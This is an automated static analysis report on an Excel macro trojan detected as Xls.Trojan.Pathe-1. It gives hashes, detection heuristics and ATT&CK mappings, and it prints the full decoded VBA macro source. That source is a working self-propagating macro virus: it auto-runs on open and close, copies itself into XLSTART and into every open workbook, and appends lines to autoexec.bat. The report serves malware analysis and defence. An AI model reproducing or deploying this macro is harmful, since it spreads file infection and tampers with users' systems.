Xls.Trojan.Pathe-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 ccde3803cb8fe2c1…

MALICIOUS

Office (OLE)

Size: 44.0 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 46d3c36b0a85249d7fb122a905aa8a35
SHA-1: 3ee83adfc181e612ad53cf2556380b702fb8bfe1
SHA-256: ccde3803cb8fe2c1df7aa0337a0c4dc383a5cf9947849c52c7c7c9292dc8d1bf
Risk Score: 160

Malware Insights

Xls.Trojan.Pathe-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Excel spreadsheet containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The ClamAV detection name 'Xls.Trojan.Pathe-1' strongly suggests a known trojan. The presence of macros indicates an attempt to deliver a malicious payload, likely via spearphishing.

Heuristics 4

  • ClamAV: Xls.Trojan.Pathe-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Pathe-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • Auto_Open macro (severity: high, rule: OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3599 bytes
SHA-256: e19e5551e88bb413693ea8dbdd653823a8df39038515c97f5b84390f623283f2
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Basilisk"
Private Sub auto_open()
On Error Resume Next
With Application
.EnableCancelKey = 0
.ScreenUpdating = False
End With
Dim Beak, Salmon, Camel As Integer
Dim BasiliskExists As Boolean
Const Draco = "C:\Draco"
For Beak = 1 To ActiveWorkbook.VBProject.VBComponents.count
    If ActiveWorkbook.VBProject.VBComponents.Item(Beak).Name = "Basilisk" Then
        Camel = Beak
    End If
Next Beak
ActiveWorkbook.VBProject.VBComponents.Item(Camel).Export Draco
If Dir("c:\program files\microsoft office\office\xlstart\book1.xls") = "" Then
    Workbooks.Add
    ActiveWorkbook.VBProject.VBComponents.Import Draco
    ActiveWorkbook.SaveAs "c:\program files\microsoft office\office\xlstart\book1.xls"
    ActiveWorkbook.Close
End If
For Beak = 1 To Excel.Windows.count
    For Salmon = 1 To Application.Workbooks.Item(Beak).VBProject.VBComponents.count
        If Application.Workbooks.Item(Beak).VBProject.VBComponents.Item(Salmon).Name = "Basilisk" Then
            BasiliskExists = True
            GoTo BasiliskFound
        Else
            BasiliskExists = False
        End If
    Next Salmon
BasiliskFound:
    If BasiliskExists <> True Then
           Application.Workbooks.Item(Beak).VBProject.VBComponents.Import Draco
           Application.Workbooks.Item(Beak).Save
           Open "c:\autoexec.bat" For Append As #1
           Print #1, "@echo T'as été mordu par... Le bec du Saumon " & Application.UserName
           'print #1, "@copy c:\windows\*.ini super.ini /Y"
           Close #1
    End If
Next Beak
Application.ScreenUpdating = True
If Month(Now) = 5 Then
    ActiveWorkbook.Close    'Pathetic, I know
End If
End Sub
Private Sub auto_close()
auto_open
End Sub